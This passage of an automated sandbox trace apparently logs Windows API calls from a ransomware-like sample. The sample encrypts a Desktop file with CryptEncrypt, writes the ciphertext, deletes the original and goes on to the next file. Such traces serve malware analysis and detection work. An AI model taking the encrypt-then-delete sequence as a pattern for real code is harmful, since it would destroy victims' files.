hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa78 | out: hHeap=0x1780000) returned 1 [0128.423] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfea0 | out: hHeap=0x1780000) returned 1 [0128.423] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2870 | out: hHeap=0x1780000) returned 1 [0128.423] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac140 | out: hHeap=0x1780000) returned 1 [0128.423] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8c30 | out: hHeap=0x1780000) returned 1 [0128.423] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab08 | out: hHeap=0x1780000) returned 1 [0128.423] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad60 | out: hHeap=0x1780000) returned 1 [0128.423] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caac0 | out: hHeap=0x1780000) returned 1 [0128.423] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac88 | out: hHeap=0x1780000) returned 1 [0128.423] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27b0 | out: hHeap=0x1780000) returned 1 [0128.423] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e2788 | out: hHeap=0x1780000) returned 1 [0128.423] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796e88 | out: hHeap=0x1780000) returned 1 [0128.423] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0128.423] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0128.423] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0128.423] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0128.423] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0128.424] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0128.424] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x43cab20, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0128.424] CryptEncrypt (in: hKey=0x41ac640, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x144e790*=0x36a1, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x144e790*=0x36b0) returned 1 [0128.424] CharLowerBuffW (in: lpsz="byte[14001]", cchLength=0xb | out: lpsz="byte[14001]") returned 0xb [0128.424] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0128.424] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0128.424] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0128.424] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x43cb030, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0128.424] CryptEncrypt (in: hKey=0x41ac640, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x49b4420*, pdwDataLen=0x144e790*=0x36a1, dwBufLen=0x36b0 | out: pbData=0x49b4420*, pdwDataLen=0x144e790*=0x36b0) returned 1 [0128.424] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0128.424] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0128.424] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0128.424] WriteFile (in: hFile=0x2a0, lpBuffer=0x49ad6c8*, nNumberOfBytesToWrite=0x36b0, lpNumberOfBytesWritten=0x144f194, lpOverlapped=0x0 | out: lpBuffer=0x49ad6c8*, lpNumberOfBytesWritten=0x144f194*=0x36b0, lpOverlapped=0x0) returned 1 [0128.474] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0128.474] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0128.474] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0128.475] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0128.475] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x43ca910, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyKey", lpUsedDefaultChar=0x0) returned 16 [0128.475] CryptDestroyKey (hKey=0x41ac640) returned 1 [0128.475] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0128.475] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0128.475] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0128.475] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0128.475] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0128.475] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0128.475] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0128.475] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0128.475] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0128.475] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0128.475] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x1796e88, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptReleaseContext", lpUsedDefaultChar=0x0) returned 20 [0128.475] CryptReleaseContext (hProv=0x41a5250, dwFlags=0x0) returned 1 [0128.476] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0128.476] FreeLibrary (hLibModule=0x756e0000) returned 1 [0128.476] CloseHandle (hObject=0x258) returned 1 [0128.476] CloseHandle (hObject=0x2a0) returned 1 [0128.478] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\xV3SDT.ots", nBufferLength=0x7fff, lpBuffer=0x143f190, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\xV3SDT.ots", lpFilePart=0x0) returned 0x22 [0128.478] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x50) returned 0x4369fd8 [0128.478] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\xV3SDT.ots" (normalized: "c:\\users\\fd1hvy\\desktop\\xv3sdt.ots")) returned 0x20 [0128.478] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9e00 [0128.478] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2200 [0128.478] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c68 [0128.478] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2320 [0128.478] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9cb0 [0128.478] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2240 [0128.478] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9e60 [0128.478] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2220 [0128.478] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf810 [0128.478] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2130 [0128.479] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x50) returned 0x436a3f8 [0128.479] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4392110 [0128.479] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x43920a0 [0128.479] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\xV3SDT.ots", lpFindFileData=0x144f1d8 | out: lpFindFileData=0x144f1d8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xdd7bbe40, ftCreationTime.dwHighDateTime=0x1d5e379, ftLastAccessTime.dwLowDateTime=0x31cf1480, ftLastAccessTime.dwHighDateTime=0x1d5e319, ftLastWriteTime.dwLowDateTime=0x31cf1480, ftLastWriteTime.dwHighDateTime=0x1d5e319, nFileSizeHigh=0x0, nFileSizeLow=0x36a1, dwReserved0=0x356310, dwReserved1=0xdf0000, cFileName="xV3SDT.ots", cAlternateFileName="")) returned 0x41ac700 [0128.479] DeleteFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\xV3SDT.ots" (normalized: "c:\\users\\fd1hvy\\desktop\\xv3sdt.ots")) returned 1 [0128.559] FindNextFileW (in: hFindFile=0x41ac700, lpFindFileData=0x144f1d8 | out: lpFindFileData=0x144f1d8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xdd7bbe40, ftCreationTime.dwHighDateTime=0x1d5e379, ftLastAccessTime.dwLowDateTime=0x31cf1480, ftLastAccessTime.dwHighDateTime=0x1d5e319, ftLastWriteTime.dwLowDateTime=0x31cf1480, ftLastWriteTime.dwHighDateTime=0x1d5e319, nFileSizeHigh=0x0, nFileSizeLow=0x36a1, dwReserved0=0x356310, dwReserved1=0xdf0000, cFileName="xV3SDT.ots", cAlternateFileName="")) returned 0 [0128.559] FindClose (in: hFindFile=0x41ac700 | out: hFindFile=0x41ac700) returned 1 [0128.559] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43920a0 | out: hHeap=0x1780000) returned 1 [0128.559] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2300 | out: hHeap=0x1780000) returned 1 [0128.559] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d88 | out: hHeap=0x1780000) returned 1 [0128.559] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2150 | out: hHeap=0x1780000) returned 1 [0128.559] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4369fd8 | out: hHeap=0x1780000) returned 1 [0128.559] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2160 | out: hHeap=0x1780000) returned 1 [0128.559] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9c50 | out: hHeap=0x1780000) returned 1 [0128.559] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9cc8 | out: hHeap=0x1780000) returned 1 [0128.559] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf428 | out: hHeap=0x1780000) returned 1 [0128.559] PeekMessageW (in: lpMsg=0x144f534, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f534) returned 1 [0128.559] TranslateMessage (lpMsg=0x144f534) returned 0 [0128.559] DispatchMessageW (lpMsg=0x144f534) returned 0x0 [0128.559] KillTimer (hWnd=0x502d2, uIDEvent=0x1) returned 1 [0128.559] SetTimer (hWnd=0x502d2, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0128.560] PeekMessageW (in: lpMsg=0x144f534, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f534) returned 0 [0128.560] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac2c0 | out: hHeap=0x1780000) returned 1 [0128.560] PeekMessageW (in: lpMsg=0x144f534, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f534) returned 0 [0128.560] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8de0 | out: hHeap=0x1780000) returned 1 [0128.560] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9c20 | out: hHeap=0x1780000) returned 1 [0128.560] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9dd0 | out: hHeap=0x1780000) returned 1 [0128.560] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d58 | out: hHeap=0x1780000) returned 1 [0128.560] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e22f0 | out: hHeap=0x1780000) returned 1 [0128.560] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf4c8 | out: hHeap=0x1780000) returned 1 [0128.560] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9890 | out: hHeap=0x1780000) returned 1 [0128.560] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e22c0 | out: hHeap=0x1780000) returned 1 [0128.560] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf7c0 | out: hHeap=0x1780000) returned 1 [0128.560] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4050e78 | out: hHeap=0x1780000) returned 1 [0128.560] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e21d0 | out: hHeap=0x1780000) returned 1 [0128.560] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9b78 | out: hHeap=0x1780000) returned 1 [0128.560] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9950 | out: hHeap=0x1780000) returned 1 [0128.560] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf608 | out: hHeap=0x1780000) returned 1 [0128.560] PeekMessageW (in: lpMsg=0x144f78c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f78c) returned 0 [0128.560] PeekMessageW (in: lpMsg=0x144f78c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f78c) returned 0 [0128.560] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e22f0 [0128.560] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf428 [0128.560] CharUpperBuffW (in: lpsz="ENCRYPTFILE", cchLength=0xb | out: lpsz="ENCRYPTFILE") returned 0xb [0128.560] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf428 | out: hHeap=0x1780000) returned 1 [0128.560] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e22f0 | out: hHeap=0x1780000) returned 1 [0128.560] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf810 [0128.560] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e22c0 [0128.560] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf608 [0128.560] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9b78 [0128.560] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2240 [0128.561] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9890 [0128.561] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e21c0 [0128.561] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796fc8 [0128.561] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9950 [0128.561] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e22f0 [0128.561] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8ac8 [0128.561] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9950 | out: hHeap=0x1780000) returned 1 [0128.561] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2300 [0128.561] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2300 | out: hHeap=0x1780000) returned 1 [0128.561] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9950 [0128.561] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x90) returned 0x4050e78 [0128.561] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8ac8 | out: hHeap=0x1780000) returned 1 [0128.561] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9950 | out: hHeap=0x1780000) returned 1 [0128.561] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796fc8 | out: hHeap=0x1780000) returned 1 [0128.561] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e21c0 | out: hHeap=0x1780000) returned 1 [0128.561] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2240 | out: hHeap=0x1780000) returned 1 [0128.561] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43c9950 [0128.561] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf7c0 [0128.561] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9cb0 [0128.561] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2240 [0128.561] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9cc8 [0128.561] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d40 [0128.561] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a9338 [0128.561] PeekMessageW (in: lpMsg=0x144f534, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f534) returned 0 [0128.561] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2150 [0128.561] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e21d0 [0128.561] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1797108 [0128.561] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797108 | out: hHeap=0x1780000) returned 1 [0128.562] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e21d0 | out: hHeap=0x1780000) returned 1 [0128.562] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2150 | out: hHeap=0x1780000) returned 1 [0128.562] PeekMessageW (in: lpMsg=0x144f534, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f534) returned 0 [0128.562] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e21c0 [0128.562] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf630 [0128.562] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9bd8 [0128.562] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2300 [0128.562] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9e78 [0128.562] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2300 | out: hHeap=0x1780000) returned 1 [0128.562] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\_uPhYhD.png", lpFindFileData=0x144f078 | out: lpFindFileData=0x144f078*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x615f6a20, ftCreationTime.dwHighDateTime=0x1d5e38b, ftLastAccessTime.dwLowDateTime=0x59628850, ftLastAccessTime.dwHighDateTime=0x1d5f0ee, ftLastWriteTime.dwLowDateTime=0x59628850, ftLastWriteTime.dwHighDateTime=0x1d5f0ee, nFileSizeHigh=0x0, nFileSizeLow=0x3390, dwReserved0=0x0, dwReserved1=0x8, cFileName="_uPhYhD.png", cAlternateFileName="")) returned 0x41ac200 [0128.562] FindClose (in: hFindFile=0x41ac200 | out: hFindFile=0x41ac200) returned 1 [0128.562] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9e78 | out: hHeap=0x1780000) returned 1 [0128.562] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9bd8 | out: hHeap=0x1780000) returned 1 [0128.562] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf630 | out: hHeap=0x1780000) returned 1 [0128.562] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2300 [0128.562] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796e88 [0128.563] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2230 [0128.563] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4392308 [0128.563] CharUpperBuffW (in: lpsz="_WINAPI_FILEINUSE", cchLength=0x11 | out: lpsz="_WINAPI_FILEINUSE") returned 0x11 [0128.563] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4392308 | out: hHeap=0x1780000) returned 1 [0128.563] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2230 | out: hHeap=0x1780000) returned 1 [0128.563] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf630 [0128.563] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2180 [0128.563] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf838 [0128.563] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d58 [0128.563] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2220 [0128.563] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c80 [0128.563] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2220 | out: hHeap=0x1780000) returned 1 [0128.563] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43c9e60 [0128.563] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf428 [0128.563] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c20 [0128.563] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2320 [0128.563] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9c20 | out: hHeap=0x1780000) returned 1 [0128.563] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf360 [0128.563] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c20 [0128.563] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9bd8 [0128.563] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a90f8 [0128.563] PeekMessageW (in: lpMsg=0x144f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f114) returned 0 [0128.563] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf388 [0128.563] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c50 [0128.563] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2130 [0128.563] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9dd0 [0128.564] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9e78 [0128.564] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2150 [0128.564] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9e78 | out: hHeap=0x1780000) returned 1 [0128.564] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2160 [0128.564] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x43920a0 [0128.564] CharUpperBuffW (in: lpsz="_WINAPI_CREATEFILEEX", cchLength=0x14 | out: lpsz="_WINAPI_CREATEFILEEX") returned 0x14 [0128.564] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43920a0 | out: hHeap=0x1780000) returned 1 [0128.564] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2160 | out: hHeap=0x1780000) returned 1 [0128.564] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf450 [0128.564] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2230 [0128.564] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf658 [0128.564] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c68 [0128.564] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2160 [0128.564] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9bf0 [0128.564] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2160 | out: hHeap=0x1780000) returned 1 [0128.564] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2160 [0128.564] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c38 [0128.564] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e21d0 [0128.564] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e21d0 | out: hHeap=0x1780000) returned 1 [0128.564] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e21d0 [0128.564] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9e00 [0128.564] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e21e0 [0128.564] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e21e0 | out: hHeap=0x1780000) returned 1 